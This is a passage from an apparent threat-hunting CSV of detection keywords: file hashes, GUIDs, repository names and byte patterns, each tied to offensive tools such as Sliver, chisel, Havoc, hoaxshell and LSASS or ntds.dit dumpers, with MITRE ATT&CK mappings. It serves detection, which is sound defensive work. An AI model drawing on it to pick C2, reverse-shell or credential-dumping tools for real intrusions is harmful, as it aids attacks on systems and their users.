TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*3fad659152d3559e2630e9e1a0e7d4c6770cfdd2e847ac6d438d852af77e591e*",".{0,1000}3fad659152d3559e2630e9e1a0e7d4c6770cfdd2e847ac6d438d852af77e591e.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - 
TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*3FBBC3DD-39D9-4D8C-AF73-EDC3D2849DEB*",".{0,1000}3FBBC3DD\-39D9\-4D8C\-AF73\-EDC3D2849DEB.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*3fd21b20d00000021c43d21b21b43d41226dd5dfc615dd4a96265559485910*",".{0,1000}3fd21b20d00000021c43d21b21b43d41226dd5dfc615dd4a96265559485910.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*3fd21b20d00000021c43d21b21b43de0a012c76cf078b8d06f4620c2286f5e*",".{0,1000}3fd21b20d00000021c43d21b21b43de0a012c76cf078b8d06f4620c2286f5e.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" 
"*3fe1b764b88336a034bff6db6532c2bc1e389680c54d38b32f2af8322ef1cfcf*",".{0,1000}3fe1b764b88336a034bff6db6532c2bc1e389680c54d38b32f2af8322ef1cfcf.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*3gstudent/COM-Object-hijacking*",".{0,1000}3gstudent\/COM\-Object\-hijacking.{0,1000}","offensive_tool_keyword","COM-Object-hijacking","use COM Object hijacking to maintain persistence.(Hijack CAccPropServicesClass and MMDeviceEnumerator)","T1546.015","TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/COM-Object-hijacking","1","1","N/A","8","1","55","30","2017-08-04T09:19:40Z","2017-08-04T08:15:36Z" "*3gstudent/Office-Persistence*",".{0,1000}3gstudent\/Office\-Persistence.{0,1000}","offensive_tool_keyword","Office-Persistence","Use powershell to test Office-based persistence methods","T1059.001 - T1137 - T1116","TA0003 ","N/A","N/A","Persistence","https://github.com/3gstudent/Office-Persistence","1","1","N/A","9","1","76","24","2021-04-17T01:39:13Z","2017-07-14T10:03:35Z" "*3gstudent/Waitfor-Persistence*",".{0,1000}3gstudent\/Waitfor\-Persistence.{0,1000}","offensive_tool_keyword","Waitfor-Persistence","Use Waitfor.exe to maintain persistence","T1059 - T1117 - T1053.005 - T1546.013","TA0002 - TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/Waitfor-Persistence","1","1","N/A","9","1","55","19","2021-04-17T01:41:42Z","2017-06-07T09:33:13Z" "*3kom-superhack.txt*",".{0,1000}3kom\-superhack\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. 
open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*3snake-master*",".{0,1000}3snake\-master.{0,1000}","offensive_tool_keyword","3snake","Tool for extracting information from newly spawned processes","T1003 - T1110 - T1552 - T1505","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/blendin/3snake","1","1","N/A","7","8","713","108","2022-02-14T17:42:10Z","2018-02-07T21:03:15Z" "*3xpl01tc0d3r/ProcessInjection*",".{0,1000}3xpl01tc0d3r\/ProcessInjection.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","1","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*4.5.6.7:1337*",".{0,1000}4\.5\.6\.7\:1337.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*40056/service-endpoint*",".{0,1000}40056\/service\-endpoint.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*40408670ce1d814a3283a625566334fa191580622adbd23effa6e3cdaaafc5d5*",".{0,1000}40408670ce1d814a3283a625566334fa191580622adbd23effa6e3cdaaafc5d5.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","10","2","129","15","2024-04-19T15:15:35Z","2022-09-13T12:42:13Z" "*4045eef04cb934ac996942d0d51e80420b2ba985*",".{0,1000}4045eef04cb934ac996942d0d51e80420b2ba985.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. 
Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*405e9c6f0b2ea355c45a80236dd541ecee957c73194dc3e7948b3ae02c8c70ea*",".{0,1000}405e9c6f0b2ea355c45a80236dd541ecee957c73194dc3e7948b3ae02c8c70ea.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*4070bbd80f416e04985826ef55eb76bef5aedfd6abf344ce25c5e7762e9d5ddc*",".{0,1000}4070bbd80f416e04985826ef55eb76bef5aedfd6abf344ce25c5e7762e9d5ddc.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*40853f24896e8e1ba7170a9775b056195567e6bbaeadb14afbb8312f35112583*",".{0,1000}40853f24896e8e1ba7170a9775b056195567e6bbaeadb14afbb8312f35112583.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*409284796af4c4aa27849cbd51e721620fe0eaa7e8482207905ac4d79bce680b*",".{0,1000}409284796af4c4aa27849cbd51e721620fe0eaa7e8482207905ac4d79bce680b.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack 
surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*409faf186d5c7ab9c289f8942614c716baed7107b57003f96d76f717bc197df4*",".{0,1000}409faf186d5c7ab9c289f8942614c716baed7107b57003f96d76f717bc197df4.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","0","N/A","N/A","10","2888","463","2024-03-29T12:50:55Z","2022-07-10T15:36:24Z" "*40af7b934df0673c434a4a92effc1928ad6294fc0ebc627718883645f0f42b58*",".{0,1000}40af7b934df0673c434a4a92effc1928ad6294fc0ebc627718883645f0f42b58.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*40B05F26-6A2F-40BC-88DE-F40D4BC77FB0*",".{0,1000}40B05F26\-6A2F\-40BC\-88DE\-F40D4BC77FB0.{0,1000}","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/florylsk/NtRemoteLoad","1","0","N/A","10","2","199","37","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" "*40C6A1BB-69AA-4869-81EE-41917D0B009A*",".{0,1000}40C6A1BB\-69AA\-4869\-81EE\-41917D0B009A.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*40E7714F-460D-4CA6-9A5A-FB32C6769BE4*",".{0,1000}40E7714F\-460D\-4CA6\-9A5A\-FB32C6769BE4.{0,1000}","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","0","N/A","10","1","81","12","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z" "*40ed4b2a45d5609b78ee36ff6779e51e932bfc50363ca6ec7c4f598d44407bdc*",".{0,1000}40ed4b2a45d5609b78ee36ff6779e51e932bfc50363ca6ec7c4f598d44407bdc.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of 
common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*40f072d74c6fa0c3e9974ca3e7ab5fdafa63487c4ace88c0ec7f539d7b79bfec*",".{0,1000}40f072d74c6fa0c3e9974ca3e7ab5fdafa63487c4ace88c0ec7f539d7b79bfec.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*40f237f59a3908d8ba89cdef811ea08cda8cfde555335efc5aa595bbbbaa2463*",".{0,1000}40f237f59a3908d8ba89cdef811ea08cda8cfde555335efc5aa595bbbbaa2463.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*410973764272a0d7b03d129471da1fb720dfdc2c9c0b0934b390bb58444b9c50*",".{0,1000}410973764272a0d7b03d129471da1fb720dfdc2c9c0b0934b390bb58444b9c50.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - 
TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*41150be536a30cd95e14bffabff19ac925a283b03425f69cdb0609e428b2ef3a*",".{0,1000}41150be536a30cd95e14bffabff19ac925a283b03425f69cdb0609e428b2ef3a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*41414141-4141-4141-4141-414141414141*",".{0,1000}41414141\-4141\-4141\-4141\-414141414141.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","0","default SMB challenge https://pbs.twimg.com/media/GHcBPL8a4AA18Jl?format=jpg","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*4161e74ca12ad3a932dba34cf3f9eb2759b66f3a00cfda052381be4304454250*",".{0,1000}4161e74ca12ad3a932dba34cf3f9eb2759b66f3a00cfda052381be4304454250.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*4164003E-BA47-4A95-8586-D5AAC399C050*",".{0,1000}4164003E\-BA47\-4A95\-8586\-D5AAC399C050.{0,1000}","offensive_tool_keyword","ADCSCoercePotato","coercing machine authentication but specific for ADCS server","T1187","TA0006","N/A","N/A","Credential Access","https://github.com/decoder-it/ADCSCoercePotato","1","0","N/A","10","2","176","23","2024-02-28T22:37:14Z","2024-02-26T12:08:34Z" "*41710a6994b2ced4ba4d7931ba0312045ef5532d38ea0072c614f23a0983cc5c*",".{0,1000}41710a6994b2ced4ba4d7931ba0312045ef5532d38ea0072c614f23a0983cc5c.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open 
source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*4181564bd544b3bbb2c49b3b6d800feac2e4438974b650c53ad4882b76d47f92*",".{0,1000}4181564bd544b3bbb2c49b3b6d800feac2e4438974b650c53ad4882b76d47f92.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*418835f7a0c331a947db1c4de194394e84c8399d3dcb94cd66182700fc105e49*",".{0,1000}418835f7a0c331a947db1c4de194394e84c8399d3dcb94cd66182700fc105e49.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*418c8a25e997241471590accb65f6e6727cd6f62d05f11c2a3b3b9667e39383b*",".{0,1000}418c8a25e997241471590accb65f6e6727cd6f62d05f11c2a3b3b9667e39383b.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - 
TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*41a60eed20397bb424a1249da58750b837cb759792e06b66218e825c03c54235*",".{0,1000}41a60eed20397bb424a1249da58750b837cb759792e06b66218e825c03c54235.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*41d36c482530d7d3a3876cb5d8f5e3a7ba35d154dfc0ea4f73f9f8793f92c387*",".{0,1000}41d36c482530d7d3a3876cb5d8f5e3a7ba35d154dfc0ea4f73f9f8793f92c387.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*42 3C 8B AC 10 88 00 00 00 44 8B 54 15 20 44 8B 5C 15 24 4C*",".{0,1000}42\s3C\s8B\sAC\s10\s88\s00\s00\s00\s44\s8B\s54\s15\s20\s44\s8B\s5C\s15\s24\s4C.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1021","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation Tools","https://github.com/rapid7/metasploit-framework","1","0","#yara rule","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*420e9c27a22ad9c6cb1535009bc23440b7a54fbef61d30e0702926e6a03502d3*",".{0,1000}420e9c27a22ad9c6cb1535009bc23440b7a54fbef61d30e0702926e6a03502d3.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*423fb953bce17ed5848e1fd48440846cb259a2981fb61906f94491d64e131728*",".{0,1000}423fb953bce17ed5848e1fd48440846cb259a2981fb61906f94491d64e131728.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*42528d08f25fcba2cb6088f4a1d810a1c1783ee3af573204094f81c2a4c0765c*",".{0,1000}42528d08f25fcba2cb6088f4a1d810a1c1783ee3af573204094f81c2a4c0765c.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*42565c3d95ecec212407c937415035ad9beff85f000036ff05fd9c39022a57b7*",".{0,1000}42565c3d95ecec212407c937415035ad9beff85f000036ff05fd9c39022a57b7.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*42751e43f472016665ac6fcccaae068dbbacd836665b11b187c025e45da439d2*",".{0,1000}42751e43f472016665ac6fcccaae068dbbacd836665b11b187c025e45da439d2.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*429be1a6cfaedaf84394b9c8364ccbfc353788f2332d6143b0131d48d39eac22*",".{0,1000}429be1a6cfaedaf84394b9c8364ccbfc353788f2332d6143b0131d48d39eac22.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*42c8296e0f553026ef98c9c89a1a6a60613c990621b9f04cf925833eb0572446*",".{0,1000}42c8296e0f553026ef98c9c89a1a6a60613c990621b9f04cf925833eb0572446.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*42d19694b284a82d02a8662edb4db86c22122ea981ca36aced94c4ba67fff072*",".{0,1000}42d19694b284a82d02a8662edb4db86c22122ea981ca36aced94c4ba67fff072.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*42d93b315b6016a420d76e3b99e46a1baa57636d30b26bc4c556a0c3b3d70a6b*",".{0,1000}42d93b315b6016a420d76e3b99e46a1baa57636d30b26bc4c556a0c3b3d70a6b.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 